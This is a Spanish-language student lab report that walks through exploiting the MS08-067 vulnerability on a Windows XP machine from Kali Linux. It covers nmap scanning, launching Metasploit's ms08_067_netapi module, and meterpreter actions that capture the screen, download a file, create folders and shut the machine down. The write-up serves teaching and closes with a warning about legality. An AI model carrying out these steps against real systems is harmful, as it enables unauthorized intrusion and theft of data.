EXPLOTAR VULNERABILIDAD EN WINDOWS XP
En el siguiente reporte de práctica, daré a conocer cómo se ejecutó un exploit en contra de una vulnerabilidad remota que se pudiera tener en un sistema. En este caso, el sistema operativo que se utilizará será Windows XP, un autentico referente dentro del sector informático. Un exploit es un programa informático, una parte de un
INTRODUCCIÓN
software o una secuencia de comandos que se aprovecha de
un
error
o
vulnerabilidad
para
provocar
un
comportamiento no intencionado o imprevisto en un software, hardware o en cualquier dispositivo electrónico. Estos comportamientos incluyen, por lo general, la toma del control
de
un
sistema,
la
concesión
privilegios
de
administrador al intruso o el lanzamiento de un ataque de denegación de servicio (DoS o DDoS).
¿QUÉ SE UTILIZARÁ?
En esta práctica utilizaremos una máquina con Kali Linux y otra con el SO Windows XP.
Para comenzar con el ataque debemos tener claro que el firewall debe ser deshabilitado y debemos también conocer cuál es nuestro segmento de red, el cual debe ser el mismo tanto de nuestro equipo, como del equipo que será víctima del ataque. 1. Entonces, el primer comando que ejecutaremos desde Kali será sólo para comprobar el segmento de red en el que estamos. El comando es el siguiente:
kali@kali:~$ ip a Fátima Abigail Porras Noriega
Página 1|9
Como podemos ver, nuestro equipo está en el segmento 192.168.43.0, nuestra dirección es la 192.168.43.113/24. 2. El siguiente comando que ejecutaremos es para descubrir las direcciones IP que están en la misma subred, a este comando se le conoce como “exploración de ping”:
kali@kali:~$ nmap -sP 192.168.43.0/24
Se nos muestran todas las direcciones que están siendo utilizadas, a nosotros la que nos interesará será la 192.168.43.123 que es la dirección de nuestra víctima. 3. El siguiente comando, lo utilizaremos escanear y verificar los puertos que están abiertos:
kali@kali:~$ nmap 192.168.43.0/24
Fátima Abigail Porras Noriega
Página 2|9
En nuestro caso, nos interesa saber los puertos de la máquina víctima, en especial el puerto 445/tcp que es fundamental para compartir archivos a través de una red TCP/IP Windows. 4. Y como último paso de verificación, ejecutaremos el comando que identifica el sistema operativo del host al que atacaremos. En nuestro caso, requerimos que la máquina .123 tenga Windows XP.
kali@kali:~$ sudo nmap -O 192.168.43.0/24
Ya que conocemos la información básica de nuestro equipo víctima, podremos comenzar con el ataque que nos permitirá entrar de manera remota a la otra máquina, dentro de la cual podremos ejecutar varias acciones. En este caso, haremos una captura de pantalla de lo que esté realizando la máquina atacada, crearemos directorios desde nuestra consola en Kali y podremos manipular archivos y también apagaremos la máquina desde la nuestra. 5. Al conocer el exploit con el cual podremos vulnerar el sistema, el primer comando que ejecutaremos será el que nos permitirá correr Metasploit.
kali@kali:~$ sudo msfconsole
6. Ahora seleccionamos el exploit para la vulnerabilidad con el comando:
msf5> use ms08_067_netapi
Fátima Abigail Porras Noriega
Página 3|9
7. El siguiente comando será para configurar el exploit, en este caso, debe contener el nombre o dirección IP de la maquina XP que queremos atacar.
msf5 exploit (windows/smb/ms08_067_netapi)> set RHOST 192.168.43.123 RHOST ➔ 192.168.43.123 Donde 192.168.43.123 corresponde a la IP de la víctima. 8. En el siguiente paso ejecutaremos el exploit, con el cual se abrirá una sesión que nos permitirá ingresar de manera remota al equipo de la victima sin necesidad de algún permiso o autorización.
msf5 exploit (windows/smb/ms08_067_netapi)> exploit
Si observamos, al ejecutar el exploit, nuestra consola cambia a ser una consola de comando meterpreter que es un intermediario con el cual interactuamos con el objetivo, desde esta consola, podemos ejecutar comandos hacia la máquina remota. 9. El primer comando que ejecutaremos directamente en la máquina remota será el de tomar una captura de pantalla de lo que está realizando y guardarla en nuestro equipo.
meterpreter > screenshot Screenshot saved to: /home/kali/mYhRUGZQ.jpeg Podemos observar que la imagen que se guardó es la siguiente:
Fátima Abigail Porras Noriega
Página 4|9
Esta imagen, es la captura de pantalla del equipo XP.
10. Otra prueba que podemos hacer del acceso remoto que logramos, es la manipulación de archivos. El primer comando que ejecutaremos será para descargar un archivo de la máquina XP a nuestra máquina.
Fátima Abigail Porras Noriega
Página 5|9
Para demostrar que esta descarga se realiza de manera exitosa, comenzaremos a navegar entre los directorios de la máquina XP.
meterpreter > download Dibujo.bmp [*] Downloading: Dibujo.bmp → Dibujo.bmp [*] Downloaded 351.62 KiB of 351.62 KiB (100.0%): Dibujo.bmp → Dibujo.bmp [*] download : Dibujo.bmp → Dibujo.bmp
Imagen descargada
Fátima Abigail Porras Noriega
Página 6|9
11. La siguiente prueba que haremos, es la creación de carpetas desde nuestra máquina, para mostrarlos en nuestra máquina xp con el comando:
meterpreter > cd Escritorio meterpreter > mkdir ‘Nueva Carpeta’ Creating directory: Nueva Carpeta meterpreter > mkdir ‘Folder nuevo’ Creating directory: Folder nuevo Aquí podemos observar que estamos ejecutando bien todo de manera remota. Podemos ver la imagen que descargamos a nuestra máquina y los archivos que creamos desde nuestra máquina a la máquina xp.
Cabe mencionar, que el proceso que seguimos para crear directorios puede ser muy parecido al momento de crear archivos. Podemos crear un archivo txt con el comando echo e imprimir el mensaje en la máquina xp.
Fátima Abigail Porras Noriega
Página 7|9
12. La última prueba que realizamos fue poder apagar la máquina XP desde nuestra máquina, con el comando:
meterpreter > shutdown Shutting down …
Fátima Abigail Porras Noriega
Página 8|9
CONCLUSIÓN
Al finalizar la práctica de esta vulnerabilidad, puedo concluir que siempre debemos procurar tener nuestras máquinas protegidas debido a que así como se vio en el exploit que ejecutamos, nos pueden estar robando información o implantando archivos que no autorizamos y lo pueden hacer sin nuestro consentimiento.
Estas prácticas pueden ser de gran peligro tanto para la pc de una persona cualquiera, como para los equipos de una organización ya que se puede conocer información confidencial de las víctimas, haciendo que este hecho pueda provocar pérdidas monetarias o de prestigio.
Es importante mencionar que estas prácticas, aunque se haya realizado, es una práctica ilegal si no se cuenta con el consentimiento de la persona que está siendo atacada y si llegaran a descubrirnos, esto podría ocasionarnos problemas muy graves.
Fátima Abigail Porras Noriega
Página 9|9